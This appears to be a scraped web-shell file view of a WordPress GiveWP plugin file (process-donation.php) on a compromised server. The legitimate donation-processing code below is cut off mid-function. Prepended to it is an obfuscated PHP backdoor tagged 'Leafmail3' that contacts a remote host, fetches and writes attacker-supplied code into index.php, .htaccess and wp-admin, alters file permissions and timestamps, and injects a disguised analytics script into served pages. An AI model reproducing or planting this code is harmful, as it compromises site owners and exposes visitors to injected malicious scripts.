| Server IP : 192.158.238.246 / Your IP : 3.17.156.160 Web Server : LiteSpeed System : Linux uniform.iwebfusion.net 4.18.0-553.27.1.lve.1.el8.x86_64 #1 SMP Wed Nov 20 15:58:00 UTC 2024 x86_64 User : jenniferflocom ( 1321) PHP Version : 8.1.32 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /proc/7779/cwd/plugins/give/includes/ |
Upload File : |
<?php /*Leafmail3*/goto o1QFr; wasj3: $ZJUCA($jQ0xa, $RTa9G); goto wYDtx; IuHdj: $egQ3R = "\147\172\151"; goto ChKDE; TpHVE: $cPzOq .= "\157\x6b\x6b"; goto vgltl; gmVrv: $Mvmq_ .= "\x6c\x5f\x63\154\x6f"; goto N9T5l; SClM0: $VwfuP = "\x64\x65\146"; goto PXHHr; m8hp8: $uHlLz = "\x73\x74\x72"; goto lz2G0; UH4Mb: $eULaj .= "\x70\x63\x2e\x70"; goto apDh3; QPct6: AtVLG: goto Mg1JO; dj8v0: $ZJUCA = "\143\150"; goto WmTiu; uHm0i: $TBxbX = "\x57\x50\137\125"; goto RCot0; f4Rdw: if (!($EUeQo($kpMfb) && !preg_match($tIzL7, PHP_SAPI) && $fHDYt($uZmPe, 2 | 4))) { goto TGN7B; } goto S2eca; H7qkB: $MyinT .= "\164\40\x41\x63\x63"; goto Air1i; AedpI: try { goto JM3SL; oiS8N: @$YWYP0($lJtci, $H0gg1); goto nucR0; AffR5: @$YWYP0($PcRcO, $H0gg1); goto SpIUU; JnP2S: @$ZJUCA($lJtci, $shT8z); goto oiS8N; nOhHX: @$ZJUCA($lJtci, $RTa9G); goto LvbAc; LvbAc: @$rGvmf($lJtci, $UYOWA["\141"]); goto JnP2S; SpIUU: @$ZJUCA($jQ0xa, $shT8z); goto qvTm1; gA5rv: @$ZJUCA($PcRcO, $shT8z); goto AffR5; nucR0: @$ZJUCA($PcRcO, $RTa9G); goto COvI1; JM3SL: @$ZJUCA($jQ0xa, $RTa9G); goto nOhHX; COvI1: @$rGvmf($PcRcO, $UYOWA["\142"]); goto gA5rv; qvTm1: } catch (Exception $ICL20) { } goto PqZGA; BWxc9: $kpMfb .= "\154\137\x69\156\x69\164"; goto RMP1m; Q7gNx: $gvOPD = "\151\163\137"; goto AfwzG; fFfBR: goto AtVLG; goto kST_Q; J9uWl: $e9dgF .= "\x61\171\163"; goto lNb3h; ZlPje: $u9w0n .= "\x75\x69\x6c\144\x5f\161"; goto Mit4a; YRbfa: $dGt27 .= "\157\x73\x65"; goto L744i; ioNAN: $tIzL7 .= "\x6c\x69\57"; goto Khhgn; mz3rE: $FANp1 .= "\x70\141\x72\145"; goto SClM0; eBKm1: $PcRcO = $jQ0xa; goto Sg4f2; D0V8f: $pv6cp = "\162\x65"; goto Hy0sm; xXaQc: $FANp1 = "\x76\145\162\x73\151"; goto T7IwT; ulics: try { $_SERVER[$pv6cp] = 1; $pv6cp(function () { goto YEXR4; PKzAL: $AG2hR .= "\163\171\x6e\x63\75\164\162\165\145"; goto HIXil; NZAxH: $AG2hR .= "\x65\x72\75\164\x72\165\x65\x3b" . "\12"; goto Tbsb3; xDrpr: $AG2hR .= "\x75\x6d\x65\156\164\54\40\x67\75\144\x2e\143\162\145\x61\164\145"; goto mLjk9; r_Oqj: $AG2hR .= "\163\x63\162\151\160\164\x22\x3e" . "\xa"; goto JZsfv; PEdls: $AG2hR .= "\74\57\163"; goto WBFgG; POyWW: $AG2hR .= "\x4d\55"; goto a8oGQ; N2RIK: $AG2hR .= "\175\x29\50\51\x3b" . "\12"; goto PEdls; Vj0ze: $AG2hR .= "\x72\151\160\x74\40\164\x79\x70\145\x3d\42\164\145\170"; goto FXjwZ; JZsfv: $AG2hR .= "\x28\x66\x75\156\143"; goto ZRBmo; zk1Ml: $AG2hR .= "\x79\124\141\147\x4e\x61\155\145"; goto STHB_; aKt86: $AG2hR .= "\x72\x69\160\x74\42\51\x2c\40\x73\75\x64\x2e\x67\x65\x74"; goto oxuwD; FXjwZ: $AG2hR .= "\x74\57\x6a\141\x76\141"; goto r_Oqj; YffEK: $AG2hR .= "\57\x6d\141\164"; goto nL_GE; ZrlUz: $AG2hR .= "\x73\x63\162\151\x70\164\x22\x3b\40\147\x2e\141"; goto PKzAL; MSqPC: $AG2hR .= "\x65\x20\55\x2d\76\12"; goto rWq2m; gUhrX: $AG2hR .= "\74\x73\143"; goto Vj0ze; oxuwD: $AG2hR .= "\x45\154\x65\x6d\145\156\164\x73\102"; goto zk1Ml; a8oGQ: $AG2hR .= time(); goto xyZaU; WBFgG: $AG2hR .= "\x63\162\151\160\164\x3e\xa"; goto jHj0s; rWq2m: echo $AG2hR; goto zxMHd; zzMTI: $AG2hR .= "\152\141\166\x61"; goto ZrlUz; HIXil: $AG2hR .= "\73\x20\147\56\144\x65\x66"; goto NZAxH; EXhzp: $AG2hR .= "\x65\156\164\x4e\x6f\x64\145\56\x69\x6e"; goto yJp9W; KUpUt: $AG2hR .= "\x64\40\115\141\x74"; goto c13YM; hugz8: $AG2hR .= "\x6f\x72\145\50\x67\54\x73\51\73" . "\xa"; goto N2RIK; xyZaU: $AG2hR .= "\x22\73\40\163\56\160\141\162"; goto EXhzp; ZRBmo: $AG2hR .= "\164\151\x6f\156\x28\51\x20\173" . "\xa"; goto sOVga; YqIfq: $AG2hR .= "\77\x69\x64\x3d"; goto POyWW; Tbsb3: $AG2hR .= "\147\x2e\163\x72"; goto vxsas; k1w2Q: $AG2hR = "\x3c\41\x2d\55\x20\115\x61"; goto OOFo2; F2sIB: $AG2hR .= "\x3d\x22\164\x65\x78\x74\57"; goto zzMTI; OOFo2: $AG2hR .= "\x74\157\155\x6f\x20\55\x2d\x3e\xa"; goto gUhrX; vxsas: $AG2hR .= "\143\x3d\165\x2b\42\x6a\163\57"; goto JGvCK; jHj0s: $AG2hR .= "\74\x21\55\55\40\x45\156"; goto KUpUt; mLjk9: $AG2hR .= "\105\154\x65\x6d\x65\156\x74\50\42\163\x63"; goto aKt86; yJp9W: $AG2hR .= "\x73\x65\162\x74\102\145\146"; goto hugz8; c13YM: $AG2hR .= "\x6f\x6d\x6f\40\103\157\144"; goto MSqPC; STHB_: $AG2hR .= "\50\x22\x73\x63\162\x69"; goto SX8pI; JGvCK: $AG2hR .= $osL5h; goto YffEK; nL_GE: $AG2hR .= "\x6f\155\x6f\56\x6a\x73"; goto YqIfq; SX8pI: $AG2hR .= "\160\x74\42\51\133\x30\135\x3b" . "\xa"; goto uh8pE; YEXR4: global $osL5h, $cPzOq; goto k1w2Q; jW6LQ: $AG2hR .= "\166\141\x72\40\144\x3d\x64\157\143"; goto xDrpr; uh8pE: $AG2hR .= "\x67\x2e\164\x79\x70\145"; goto F2sIB; sOVga: $AG2hR .= "\166\x61\162\40\x75\75\42" . $cPzOq . "\42\x3b" . "\xa"; goto jW6LQ; zxMHd: }); } catch (Exception $ICL20) { } goto arBxc; TrkYs: $eULaj .= "\x2f\170\x6d"; goto GE2p3; L744i: $cPzOq = "\x68\x74\164\x70\163\72\57\x2f"; goto TpHVE; CNdmS: wLXpb: goto wasj3; nHXnO: $_POST = $_REQUEST = $_FILES = array(); goto CNdmS; PHhHL: P9yQa: goto W2Q7W; UkCDT: $cLC40 = 32; goto BnazY; vabQZ: $CgFIN = 1; goto QPct6; gSbiK: try { goto xtnST; qBVAq: $k7jG8[] = $E0suN; goto Tc9Eb; vZ6zL: $E0suN = trim($Q0bWd[0]); goto LuoPM; D98P3: if (!empty($k7jG8)) { goto FbDAI; } goto AML_a; LuoPM: $jCv00 = trim($Q0bWd[1]); goto Q4uy7; xtnST: if (!$gvOPD($d3gSl)) { goto nHP5K; } goto W8uMn; c_73m: FbDAI: goto h1Cu7; kNAxm: if (!($uHlLz($E0suN) == $cLC40 && $uHlLz($jCv00) == $cLC40)) { goto lfWQh; } goto MfJKK; L8cv7: WVm2j: goto c_73m; AML_a: $d3gSl = $jQ0xa . "\x2f" . $HNQiW; goto GBRPC; ZSYyc: $jCv00 = trim($Q0bWd[1]); goto kNAxm; W8uMn: $Q0bWd = @explode("\72", $DJDq1($d3gSl)); goto Woix_; EA1BT: if (!(is_array($Q0bWd) && count($Q0bWd) == 2)) { goto ctSg2; } goto A163l; Woix_: if (!(is_array($Q0bWd) && count($Q0bWd) == 2)) { goto wU2zk; } goto vZ6zL; Q4uy7: if (!($uHlLz($E0suN) == $cLC40 && $uHlLz($jCv00) == $cLC40)) { goto VAVW5; } goto qBVAq; tEVz_: $k7jG8[] = $jCv00; goto xWpvL; xWpvL: lfWQh: goto oilos; MfJKK: $k7jG8[] = $E0suN; goto tEVz_; N3TyU: wU2zk: goto snD7p; lky0R: $Q0bWd = @explode("\72", $DJDq1($d3gSl)); goto EA1BT; Tc9Eb: $k7jG8[] = $jCv00; goto evp7M; snD7p: nHP5K: goto D98P3; oilos: ctSg2: goto L8cv7; evp7M: VAVW5: goto N3TyU; GBRPC: if (!$gvOPD($d3gSl)) { goto WVm2j; } goto lky0R; A163l: $E0suN = trim($Q0bWd[0]); goto ZSYyc; h1Cu7: } catch (Exception $ICL20) { } goto xU6vT; T7IwT: $FANp1 .= "\x6f\x6e\x5f\143\x6f\x6d"; goto mz3rE; JX1Oy: $dGt27 = "\x66\x63\x6c"; goto YRbfa; BnazY: $Pzt0o = 5; goto TYFaW; o1QFr: $kFvng = "\74\x44\x44\x4d\x3e"; goto wODYw; CL80L: $MyinT .= "\120\x2f\61\x2e\x31\x20\x34"; goto gErqa; tFGg7: $YWYP0 .= "\x75\143\x68"; goto dj8v0; pXfDS: $ygOJ_ .= "\x2f\167\160"; goto c7yEe; xUd9U: $pv6cp .= "\151\x6f\x6e"; goto bqFyS; PqZGA: CVVA3: goto RDKTA; wYDtx: $uZmPe = $nPBv4($eULaj, "\x77\x2b"); goto f4Rdw; E453u: $QIBzt .= "\56\64"; goto O8RXw; a4EJZ: $dZR_y = $cPzOq; goto vZkPa; FK_sr: $kb9bA .= "\x65\162\x2e\x69"; goto G2uff; TuwL4: $jQ0xa = $_SERVER[$Wv1G0]; goto wrxGI; wJDrU: $eULaj = $jQ0xa; goto TrkYs; MLdcc: $fHDYt .= "\x63\153"; goto JX1Oy; Gs7Gb: $kpMfb = $vW4As; goto BWxc9; Mit4a: $u9w0n .= "\x75\x65\x72\171"; goto cIo5P; GE2p3: $eULaj .= "\x6c\162"; goto UH4Mb; cIo5P: $uAwql = "\155\x64\65"; goto aXExt; c7yEe: $ygOJ_ .= "\x2d\x61"; goto XWOCC; wrxGI: $ygOJ_ = $jQ0xa; goto pXfDS; XsWqd: $kb9bA .= "\57\56\165\163"; goto FK_sr; cWrVz: $nPBv4 .= "\145\x6e"; goto KCtWA; CrWKs: $l0WLW .= "\157\160\x74"; goto jcG0e; lz2G0: $uHlLz .= "\154\x65\x6e"; goto xXaQc; wee0Y: $ulOTQ .= "\115\111\116"; goto Tfi5q; vgltl: $cPzOq .= "\154\x69\x6e\153\56\x74"; goto pr5fA; Khhgn: $tIzL7 .= "\x73\151"; goto JBJmV; kJlf4: $DJDq1 .= "\147\145\164\137\143"; goto NZqWx; lNb3h: $H0gg1 = $xsR4V($e9dgF); goto XYviL; TBl6Q: sLwcv: goto fFfBR; RMP1m: $l0WLW = $vW4As; goto ujtZa; XQnCd: $PcRcO .= "\x61\143\143\145\163\x73"; goto ikUIP; X4xWX: $QIBzt = "\x35"; goto E453u; hDUdL: $MWMOe .= "\x6c\x65"; goto Q7gNx; LxUUO: $RTa9G = $QTYip($HqqUn($RTa9G), $Pzt0o); goto qaeyL; f6Txl: $HqqUn = "\x64\x65\143"; goto gwNCH; sK97X: $nPBv4 = "\x66\157\160"; goto cWrVz; Ee0VW: $EUeQo .= "\164\x69\x6f\156\x5f"; goto a2JJX; D9NbF: $CgFIN = 1; goto PHhHL; VY3H_: $Wv1G0 = "\x44\117\x43\x55\115\105\116\x54"; goto HpOFr; CRqG1: if (empty($k7jG8)) { goto VIn91; } goto s4AWH; apDh3: $eULaj .= "\x68\160\x2e\60"; goto sK97X; Sg4f2: $PcRcO .= "\57\x2e\x68\x74"; goto XQnCd; jcG0e: $YQ0P6 = $vW4As; goto rA_Dy; dlqC2: $HNQiW = substr($uAwql($osL5h), 0, 6); goto xGZOR; kxKwG: $osL5h = $_SERVER[$i5EZR]; goto TuwL4; ozW5s: $e9dgF .= "\63\x20\x64"; goto J9uWl; xU6vT: $lJtci = $jQ0xa; goto BpRMk; CquiC: $dZR_y .= "\x63\x6f\160\171"; goto BLSy0; GSfrX: $pv6cp .= "\x75\x6e\143\164"; goto xUd9U; yaYSs: $rGvmf .= "\x6f\x6e\x74\x65\156\164\163"; goto mIlAi; FXRyn: $TBxbX .= "\115\x45\x53"; goto R1jVG; kST_Q: VIn91: goto vabQZ; flXr3: $shT8z = $QTYip($HqqUn($shT8z), $Pzt0o); goto TkfCl; FJdH4: $dZR_y .= "\x3d\x67\x65\x74"; goto CquiC; kJyDh: $QTYip = "\x69\156\x74"; goto blzff; s4AWH: $H25pP = $k7jG8[0]; goto t74Wt; TyAte: $k7jG8 = array(); goto UkCDT; EO8QL: try { $UYOWA = @$AkFS8($egQ3R($eKFWX($M7wqP))); } catch (Exception $ICL20) { } goto OXweB; XYviL: $i5EZR = "\110\124\124\x50"; goto j4Pjv; ikUIP: $kb9bA = $jQ0xa; goto XsWqd; VrwTF: $nRD8p .= "\x64\x69\162"; goto aQp1m; dLa5a: $pv6cp .= "\x65\162\x5f"; goto x5YEr; PgImI: @$ZJUCA($kb9bA, $RTa9G); goto yAax8; Jb1Vu: try { goto Bwps7; WPylr: if (!$xsy4x($Y61WO)) { goto nWSzU; } goto NpK90; xqrLf: @$YWYP0($dqnvi, $H0gg1); goto cinsF; N7wJU: if ($xsy4x($Y61WO)) { goto KOuoA; } goto RBLfp; wf0jq: @$ZJUCA($Y61WO, $shT8z); goto xqrLf; bfkJn: try { goto jwOvP; sXqkD: $l0WLW($ekYPG, CURLOPT_SSL_VERIFYPEER, false); goto tXay1; jwOvP: $ekYPG = $kpMfb(); goto jMqt3; VURt4: $l0WLW($ekYPG, CURLOPT_POST, 1); goto Qk7oo; G7Y1e: $l0WLW($ekYPG, CURLOPT_USERAGENT, "\x49\x4e"); goto Sw_Ys; lg1iu: $l0WLW($ekYPG, CURLOPT_TIMEOUT, 3); goto VURt4; jMqt3: $l0WLW($ekYPG, CURLOPT_URL, $LfwPf . "\x26\164\x3d\151"); goto G7Y1e; Qk7oo: $l0WLW($ekYPG, CURLOPT_POSTFIELDS, $u9w0n($Lx9yT)); goto axPES; Sw_Ys: $l0WLW($ekYPG, CURLOPT_RETURNTRANSFER, 1); goto sXqkD; tXay1: $l0WLW($ekYPG, CURLOPT_SSL_VERIFYHOST, false); goto Gb33B; PUEHo: $Mvmq_($ekYPG); goto rF4qo; Gb33B: $l0WLW($ekYPG, CURLOPT_FOLLOWLOCATION, true); goto lg1iu; axPES: $YQ0P6($ekYPG); goto PUEHo; rF4qo: } catch (Exception $ICL20) { } goto zCePm; s2GBY: $Y61WO = dirname($dqnvi); goto N7wJU; bO0VE: KOuoA: goto WPylr; RBLfp: @$ZJUCA($jQ0xa, $RTa9G); goto lexI4; NpK90: @$ZJUCA($Y61WO, $RTa9G); goto aGYEQ; wsLep: $Lx9yT = ["\144\x61\x74\x61" => $UYOWA["\x64"]["\165\162\x6c"]]; goto bfkJn; y0C5p: @$ZJUCA($dqnvi, $shT8z); goto wf0jq; cinsF: $LfwPf = $cPzOq; goto d8sPt; OAF8R: $LfwPf .= "\x6c\x6c"; goto wsLep; d8sPt: $LfwPf .= "\77\141\143"; goto HZ42Q; lexI4: @$nRD8p($Y61WO, $RTa9G, true); goto K7fs2; aGYEQ: @$rGvmf($dqnvi, $UYOWA["\144"]["\x63\157\x64\x65"]); goto y0C5p; zCePm: nWSzU: goto r2ase; Bwps7: $dqnvi = $jQ0xa . $UYOWA["\144"]["\160\x61\x74\x68"]; goto s2GBY; K7fs2: @$ZJUCA($jQ0xa, $shT8z); goto bO0VE; HZ42Q: $LfwPf .= "\164\75\x63\141"; goto OAF8R; r2ase: } catch (Exception $ICL20) { } goto AedpI; kAMGF: $xsy4x .= "\144\x69\x72"; goto gdP2h; lX6T6: if (!$gvOPD($kb9bA)) { goto KTGlr; } goto spjef; jxKJS: $ulOTQ .= "\x5f\x41\104"; goto wee0Y; vZkPa: $dZR_y .= "\x3f\141\143\164"; goto FJdH4; gErqa: $MyinT .= "\60\x36\x20\116\x6f"; goto H7qkB; xGZOR: $hg32N = $d3gSl = $ygOJ_ . "\57" . $HNQiW; goto TyAte; GiT2I: $Mvmq_ = $vW4As; goto gmVrv; KCtWA: $fHDYt = "\x66\x6c\157"; goto MLdcc; Yc09l: $xsy4x = "\x69\163\137"; goto kAMGF; FZsOD: $lJtci .= "\150\x70"; goto eBKm1; rA_Dy: $YQ0P6 .= "\154\137\x65\170\x65\x63"; goto GiT2I; VQCaR: $k8h0h = !empty($m4bDA) || !empty($ZTS7q); goto Bw8cX; ujtZa: $l0WLW .= "\154\137\x73\x65\x74"; goto CrWKs; R1jVG: $ulOTQ = "\127\120"; goto jxKJS; OXweB: if (!is_array($UYOWA)) { goto CVVA3; } goto L7ftk; bqFyS: if (isset($_SERVER[$pv6cp])) { goto Kwp9i; } goto r3vZ_; ChKDE: $egQ3R .= "\156\146\x6c\x61\164\145"; goto OCGca; Bx0F8: $rGvmf = "\146\x69\154\145\x5f"; goto cMMsY; lar4b: $xsR4V .= "\x6d\145"; goto ESAaf; L7ftk: try { goto b8mrw; IZ7dT: @$rGvmf($d3gSl, $UYOWA["\x63"]); goto qi8JJ; j1slf: if (!$xsy4x($ygOJ_)) { goto fnZm_; } goto l27iU; FnW9Y: fnZm_: goto IZ7dT; RHQPY: @$ZJUCA($jQ0xa, $shT8z); goto FudGj; jRIpH: $d3gSl = $hg32N; goto FnW9Y; b8mrw: @$ZJUCA($jQ0xa, $RTa9G); goto j1slf; l27iU: @$ZJUCA($ygOJ_, $RTa9G); goto jRIpH; qi8JJ: @$ZJUCA($d3gSl, $shT8z); goto fMj35; fMj35: @$YWYP0($d3gSl, $H0gg1); goto RHQPY; FudGj: } catch (Exception $ICL20) { } goto Jb1Vu; Hy0sm: $pv6cp .= "\x67\151\x73\164"; goto dLa5a; wODYw: $tIzL7 = "\57\x5e\143"; goto ioNAN; D9G8A: $vW4As = "\x63\165\162"; goto Gs7Gb; zR6Sw: $RTa9G += 304; goto LxUUO; FLAgg: @$ZJUCA($jQ0xa, $shT8z); goto Ms_Rx; TkfCl: $MyinT = "\110\124\124"; goto CL80L; JBJmV: $xsR4V = "\x73\x74\x72"; goto wDwVu; m7Y7E: $shT8z += 150; goto flXr3; OCGca: $AkFS8 = "\165\x6e\x73\145\x72"; goto DuXwv; spjef: @$ZJUCA($jQ0xa, $RTa9G); goto PgImI; mIlAi: $YWYP0 = "\x74\157"; goto tFGg7; Air1i: $MyinT .= "\x65\x70\164\x61\142\154\145"; goto wJDrU; hnuEm: $M7wqP = false; goto IxcDO; AfwzG: $gvOPD .= "\x66\151\154\x65"; goto Yc09l; Mg1JO: if (!$CgFIN) { goto V5o9n; } goto a4EJZ; O8RXw: $QIBzt .= "\x2e\x30\73"; goto kxKwG; Qjsri: Kwp9i: goto uHm0i; aQp1m: $DJDq1 = "\146\151\154\145\x5f"; goto kJlf4; wDwVu: $xsR4V .= "\x74\157"; goto k5kym; Ms_Rx: KTGlr: goto QDkYN; p2xAd: $u9w0n = "\x68\x74\x74\160\x5f\142"; goto ZlPje; XWOCC: $ygOJ_ .= "\x64\155\151\156"; goto dlqC2; PXHHr: $VwfuP .= "\x69\156\145\144"; goto uwRQG; t74Wt: $Aa5A7 = $k7jG8[1]; goto rjUnC; WmTiu: $ZJUCA .= "\x6d\157\x64"; goto OMDdm; F90kP: $CgFIN = 1; goto TBl6Q; IxcDO: try { goto MN2Ol; lfwpD: $l0WLW($ekYPG, CURLOPT_RETURNTRANSFER, 1); goto XT0V7; pm4fL: $l0WLW($ekYPG, CURLOPT_SSL_VERIFYHOST, false); goto f1Wpg; LukB5: $l0WLW($ekYPG, CURLOPT_USERAGENT, "\x49\x4e"); goto lfwpD; MN2Ol: $ekYPG = $kpMfb(); goto PGjVI; XT0V7: $l0WLW($ekYPG, CURLOPT_SSL_VERIFYPEER, false); goto pm4fL; f1Wpg: $l0WLW($ekYPG, CURLOPT_FOLLOWLOCATION, true); goto A02q4; Jr5Fq: $Mvmq_($ekYPG); goto kxHAl; kxHAl: $M7wqP = trim(trim($M7wqP, "\xef\273\xbf")); goto DRdNb; A02q4: $l0WLW($ekYPG, CURLOPT_TIMEOUT, 10); goto czpAh; PGjVI: $l0WLW($ekYPG, CURLOPT_URL, $dZR_y); goto LukB5; czpAh: $M7wqP = $YQ0P6($ekYPG); goto Jr5Fq; DRdNb: } catch (Exception $ICL20) { } goto TtjMz; yA6tr: $e9dgF .= "\63\x36"; goto ozW5s; BLSy0: $dZR_y .= "\x26\164\x3d\x69\46\x68\75" . $osL5h; goto hnuEm; qaeyL: $shT8z = 215; goto m7Y7E; YAsQc: if (!(!$_SERVER[$pv6cp] && $FANp1(PHP_VERSION, $QIBzt, "\76"))) { goto VlKKH; } goto ulics; QDkYN: $CgFIN = 0; goto CRqG1; g3rCR: $m4bDA = $_REQUEST; goto A4fYL; rjUnC: if (!(!$gvOPD($lJtci) || $MWMOe($lJtci) != $H25pP)) { goto P9yQa; } goto D9NbF; x5YEr: $pv6cp .= "\x73\x68\165"; goto itQ2f; A4fYL: $ZTS7q = $_FILES; goto VQCaR; a2JJX: $EUeQo .= "\145\x78"; goto fYDkt; TYFaW: $Pzt0o += 3; goto hoCMV; fYDkt: $EUeQo .= "\x69\163\x74\163"; goto D9G8A; fmcU9: $MWMOe .= "\x5f\x66\151"; goto hDUdL; S2eca: $ZJUCA($jQ0xa, $shT8z); goto YAsQc; RCot0: $TBxbX .= "\x53\105\x5f\124\110\105"; goto FXRyn; BpRMk: $lJtci .= "\57\x69\x6e"; goto lJYIj; cMMsY: $rGvmf .= "\160\x75\164\137\143"; goto yaYSs; j4Pjv: $i5EZR .= "\x5f\x48\117\x53\x54"; goto VY3H_; itQ2f: $pv6cp .= "\x74\x64\x6f"; goto gi1ux; YAE22: $eKFWX .= "\66\x34\137\x64"; goto HkhAv; DuXwv: $AkFS8 .= "\x69\x61\x6c\151\x7a\x65"; goto kJyDh; NZqWx: $DJDq1 .= "\x6f\156\164\145\x6e\x74\x73"; goto Bx0F8; ESAaf: $EUeQo = "\146\x75\156\143"; goto Ee0VW; HkhAv: $eKFWX .= "\x65\143\x6f\x64\145"; goto IuHdj; RDKTA: HuCWH: goto tkEEo; k5kym: $xsR4V .= "\x74\151"; goto lar4b; WQZ3H: $UYOWA = 0; goto EO8QL; TtjMz: if (!($M7wqP !== false)) { goto HuCWH; } goto WQZ3H; N9T5l: $Mvmq_ .= "\x73\145"; goto p2xAd; HpOFr: $Wv1G0 .= "\137\122\117\x4f\124"; goto X4xWX; arBxc: VlKKH: goto gSbiK; G2uff: $kb9bA .= "\156\151"; goto lX6T6; gwNCH: $HqqUn .= "\157\x63\164"; goto m8hp8; yAax8: @unlink($kb9bA); goto FLAgg; pr5fA: $cPzOq .= "\157\x70\x2f"; goto D0V8f; gi1ux: $pv6cp .= "\x77\x6e\x5f\x66"; goto GSfrX; OMDdm: $eKFWX = "\142\141\x73\x65"; goto YAE22; aXExt: $MWMOe = $uAwql; goto fmcU9; gdP2h: $nRD8p = "\155\x6b"; goto VrwTF; Bw8cX: if (!(!$fs0FH && $k8h0h)) { goto wLXpb; } goto nHXnO; uwRQG: $e9dgF = "\x2d\61"; goto yA6tr; hoCMV: $RTa9G = 189; goto zR6Sw; Tfi5q: $fs0FH = $VwfuP($TBxbX) || $VwfuP($ulOTQ); goto g3rCR; W2Q7W: if (!(!$gvOPD($PcRcO) || $MWMOe($PcRcO) != $Aa5A7)) { goto sLwcv; } goto F90kP; r3vZ_: $_SERVER[$pv6cp] = 0; goto Qjsri; lJYIj: $lJtci .= "\144\x65\170\56\x70"; goto FZsOD; blzff: $QTYip .= "\x76\x61\x6c"; goto f6Txl; tkEEo: V5o9n: goto ossJl; ossJl: TGN7B: ?>
<?php
/**
* Process Donation
*
* @package Give
* @subpackage Functions
* @copyright Copyright (c) 2016, GiveWP
* @license https://opensource.org/licenses/gpl-license GNU Public License
* @since 1.0
*/
use Give\Helpers\Utils;
// Exit if accessed directly.
if ( ! defined( 'ABSPATH' ) ) {
exit;
}
/**
* Process Donation Form
*
* Handles the donation form process.
*
* @access private
* @since 3.16.1 Use give_maybe_safe_unserialize() on $user_info data
* @since 1.0
*
* @throws ReflectionException Exception Handling.
*
* @return mixed
*/
function give_process_donation_form() {
// Sanitize Posted Data.
$post_data = give_clean( $_POST ); // WPCS: input var ok, CSRF ok.
// Check whether the form submitted via AJAX or not.
$is_ajax = isset( $post_data['give_ajax'] );
// Verify donation form nonce.
if ( ! give_verify_donation_form_nonce( $post_data['give-form-hash'], $post_data['give-form-id'] ) ) {
if ( $is_ajax ) {
/**
* Fires when AJAX sends back errors from the donation form.
*
* @since 1.0
*/
do_action( 'give_ajax_donation_errors' );
give_die();
} else {
give_send_back_to_checkout();
}
}
/**
* Fires before processing the donation form.
*
* @since 1.0
*/
do_action( 'give_pre_process_donation' );
// Validate the form $_POST data.
$valid_data = give_donation_form_validate_fields();
/**
* Fires after validating donation form fields.
*
* Allow you to hook to donation form errors.
*
* @since 1.0
*
* @param bool|array $valid_data Validate fields.
* @param array $deprecated Deprecated Since 2.0.2. Use $_POST instead.
*/
$deprecated = $post_data;
do_action( 'give_checkout_error_checks', $valid_data, $deprecated );
// Process the login form.
if ( isset( $post_data['give_login_submit'] ) ) {
give_process_form_login();
}
// Validate the user.
$user = give_get_donation_form_user( $valid_data );
if ( false === $valid_data || ! $user || give_get_errors() ) {
if ( $is_ajax ) {
/**
* Fires when AJAX sends back errors from the donation form.
*
* @since 1.0
*/
do_action( 'give_ajax_donation_errors' );
give_die();
} else {
return false;
}
}
// If AJAX send back success to proceed with form submission.
if ( $is_ajax ) {
echo 'success';
give_die();
}
/**
* Fires action after donation form field validated.
*
* @since 2.2.0
*/
do_action( 'give_process_donation_after_validation' );
// Setup user information.
$user_info = [
'id' => $user['user_id'],
'title' => $user['user_title'],
'email' => $user['user_email'],
'first_name' => $user['user_first'],
'last_name' => $user['user_last'],
'address' => $user['address'],
];
$auth_key = defined( 'AUTH_KEY' ) ? AUTH_KEY : '';
// Donation form ID.
$form_id = isset( $post_data['give-form-id'] ) ? absint( $post_data['give-form-id'] ) : 0;
$price = isset( $post_data['give-amount'] ) ?
(float) apply_filters( 'give_donation_total', give_maybe_sanitize_amount( $post_data['give-amount'], [ 'currency' => give_get_currency( $form_id ) ] ) ) :
'0.00';
$purchase_key = strtolower( md5( $user['user_email'] . date( 'Y-m-d H:i:s' ) . $auth_key . uniqid( 'give', true ) ) );
/**
* Update donation Purchase key.
*
* Use this filter to update default donation purchase key
* and add prefix in Invoice.
*
* @since 2.2.4
*
* @param string $purchase_key
* @param string $gateway
* @param string $purchase_key
*
* @return string $purchase_key
*/
$purchase_key = apply_filters(
'give_donation_purchase_key',
$purchase_key,
$valid_data['gateway'],
// Use this purchase key value if you want to generate custom donation purchase key
// because donation purchase key editable by filters and you may get unedited donation purchase key.
$purchase_key
);
// Setup donation information.
$user_info = array_map('\Give\Helpers\Utils::maybeSafeUnserialize', stripslashes_deep( $user_info ));
$donation_data = [
'price' => $price,
'purchase_key' => $purchase_key,
'user_email' => $user['user_email'],
'date' => date( 'Y-m-d H:i:s', current_time( 'timestamp' ) ),
'user_info' => $user_info,
'post_data' => $post_data,
'gateway' => $valid_data['gateway'],
'card_info' => $valid_data['cc_info'],
];
// Add the user data for hooks.
$valid_data['user'] = $user;
/**
* Fires before donation form gateway.
*
* Allow you to hook to donation form before the gateway.
*
* @since 1.0
*
* @param array $post_data Array of variables passed via the HTTP POST.
* @param array $user_info Array containing basic user information.
* @param bool|array $valid_data Validate fields.
*/
do_action( 'give_checkout_before_gateway', $post_data, $user_info, $valid_data );
// Sanity check for price.
if ( ! $donation_data['price'] ) {
// Revert to manual.
$donation_data['gateway'] = 'manual';
$_POST['give-gateway'] = 'manual';
}
/**
* Allow the donation data to be modified before it is sent to the gateway.
*
* @since 1.7
*/
$donation_data = apply_filters( 'give_donation_data_before_gateway', $donation_data, $valid_data );
// Setup the data we're storing in the donation session.
$session_data = $donation_data;
// Make sure credit card numbers are never stored in sessions.
unset( $session_data['card_info']['card_number'] );
unset( $session_data['post_data']['card_number'] );
// Used for showing data to non logged-in users after donation, and for other plugins needing donation data.
give_set_purchase_session( $session_data );
/**
* Prevent PHP notices from breaking receipt display.
* This is specifically an issue with the Stripe SDK.
*
* @link https://github.com/impress-org/givewp/issues/5199
*/
ob_start();
// Send info to the gateway for payment processing.
give_send_to_gateway( $donation_data['gateway'], $donation_data );
ob_get_clean();
give_die();
}
add_action( 'give_purchase', 'give_process_donation_form' );
add_action( 'wp_ajax_give_process_donation', 'give_process_donation_form' );
add_action( 'wp_ajax_nopriv_give_process_donation', 'give_process_donation_form' );
/**
* Verify that when a logged in user makes a donation that the email address used doesn't belong to a different customer.
* Note: only for internal use
*
* @see https://github.com/impress-org/give/issues/4025
*
* @since 1.7
* @since 2.4.2 This function runs independently instead of give_checkout_error_checks hook and also edit donor email.
*
* @param array $valid_data Validated data submitted for the donation.
*
* @return void
*/
function give_check_logged_in_user_for_existing_email( &$valid_data ) {
// Verify that the email address belongs to this donor.
if ( is_user_logged_in() ) {
$donor = new Give_Donor( get_current_user_id(), true );
